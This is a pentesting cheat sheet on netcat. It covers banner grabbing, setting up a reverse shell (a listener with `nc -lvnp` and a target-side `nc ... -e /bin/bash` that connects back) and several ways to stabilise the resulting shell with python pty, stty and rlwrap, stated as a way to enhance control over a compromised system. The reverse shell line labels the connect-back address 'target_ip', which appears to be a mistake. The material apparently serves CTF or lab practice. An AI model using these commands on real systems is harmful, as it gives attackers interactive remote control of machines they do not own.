# Netcat - Advanced

## Usage and Examples

### Using netcat for banner grabbing

```bash
nc 192.168.1.1 80
```

### Reverse shell with netcat

On listener's machine:

```bash
nc -lvnp 1234
```

(The option specifies listening verbosely on the given port with no name resolution)

On target machine:

```bash
nc [target_ip] 1234 -e /bin/bash
```

(Specifying `-e /bin/bash` is optional.)

## Stabilizing Netcat

By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell involves transforming it into a more robust and interactive session in order to improve its reliability, and enhance the control over the compromised system.

## Methods for Netcat Shell Stabilization

### Using `rlwrap`

Steps:

#### 1. Install `rlwrap` in your local machine if not installed

```bash
sudo apt-get install rlwrap
```

#### 2. Use the netcat command with `rlwrap`

```bash
rlwrap nc -lvnp 4444
```

3. Background the shell with `Ctrl + Z` .
4. Re-enter the shell

```bash
stty raw -echo; fg
```

### Upgrading to fully interactive TTY

Use python:

1.

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

2.

```bash
export TERM=xterm
```

3.

```bash
stty raw -echo; fg
```

### Setting terminal variables

Steps:

#### Background the netcat shell

Use the command `CTRL + Z`.

#### Set terminal typs

```bash
stty raw -echo; fg
```

#### Export terminal variables

```bash
reset
```

```bash
export SHELL=bash
```

```bash
export TERM=xterm
```

```bash
stty rows [number] columns [number]
```

(Replace `[number]` with the appropriate values for your terminal size)

## Overview of Netcat Shell stabilization

Step 1:

Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

We still won’t be able to use tab autocomplete or the arrow keys.

Step 2:

Get access to term commands such as clear.

```bash
export TERM=xterm
```

Step 3:

Now, background the shell.

```
Ctrl + Z
```

Step 4:

Use the following back in the normal terminal:

```bash
stty raw -echo; fg
```

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes.

Step 5:

Finally correct the distorted rows and columns of the terminal shell where we write command.

```bash
stty rows 38 columns 116
```